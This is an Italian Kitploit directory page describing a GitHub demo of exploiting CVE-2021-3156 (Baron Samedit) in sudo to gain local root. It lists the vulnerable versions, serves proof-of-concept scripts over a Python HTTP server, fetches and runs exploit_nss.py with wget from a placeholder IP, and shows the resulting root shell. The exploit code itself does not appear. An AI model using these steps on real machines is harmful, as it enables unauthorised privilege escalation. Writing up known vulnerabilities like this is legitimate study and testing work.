Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Review.CVE-2021-3156 — CVE-2021-3156-Exploit-Demo | Kitploit
Strumenti/GitHubGitHub/topskiypavelqwertygang/review.cve-2021-3156
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingRed TeamingBinary Exploitation
GitHubtopskiypavelqwertygang/review.cve-2021-3156

Review.CVE-2021-3156

CVE-2021-3156-Exploit-Demo

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
431 anno faNon ancora revisionato

👑 CVE-2021-3156 (Baron Samedit) — Escalation dei privilegi tramite heap overflow in sudo

📅 Data: 2025-06-08
✍️ Autore: @TopskiyPavelQwertyGang 🧠 Ricercatore di sicurezza | Appassionato di Red Team


🧠 Panoramica CVE

  • CVE-ID: CVE-2021-3156
  • Tipo: Heap-based Buffer Overflow
  • Componente: sudoedit (sudo)
  • Livello di accesso: Locale
  • Obiettivo: Ottenere privilegi di root

🧠 Descrizione

Heap-overflow in sudoedit consente a un utente locale di ottenere accesso root
quando si esegue il comando sudoedit con parametri appositamente predisposti.

La vulnerabilità è sfruttabile per le versioni di sudo < 1.9.5p2, incluse le popolari immagini Ubuntu/Debian/CentOS.
Anche con ASLR attivo, la vulnerabilità rimane sfruttabile.


🐾 Condizioni di sfruttamento

root@kitploit:~
OS     : Ubuntu 20.04.3 LTS
glibc  : 2.31 (tcache ON)
sudo   : 1.8.31 (уязвим)
ASLR   : 2 (включён)

🧪 Preparazione dell'ambiente

  1. Verificate le versioni di glibc e sudo:
root@kitploit:~
ldd --version
sudo --version
  1. Trasferiti gli script PoC da un'altra macchina tramite un server HTTP integrato:
root@kitploit:~
python3 -m http.server 80
  1. Sulla macchina target i PoC vengono scaricati ed eseguiti:
root@kitploit:~
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py

🚀 Sfruttamento riuscito di Poс

root@kitploit:~
$ python3 exploit_nss.py
# whoami
root

🧾 Conclusione

Lo sfruttamento di CVE-2021-3156 rimane possibile anche con ASLR attivo, se glibc ≥ 2.26 e sudo è di una versione vulnerabile.
L'exploit più stabile si è rivelato exploit_nss.py, che funziona al primo tentativo con una corretta configurazione NSS.

🧨 Sistema sotto controllo.


Scarica lo strumento